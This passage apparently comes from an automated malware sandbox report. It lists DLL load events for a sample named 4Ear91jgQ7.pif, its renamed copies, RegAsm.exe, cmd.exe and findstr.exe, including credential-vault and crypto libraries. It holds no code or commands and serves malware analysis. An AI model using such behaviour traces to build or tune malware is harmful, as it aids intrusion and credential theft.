            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasapi32.dll
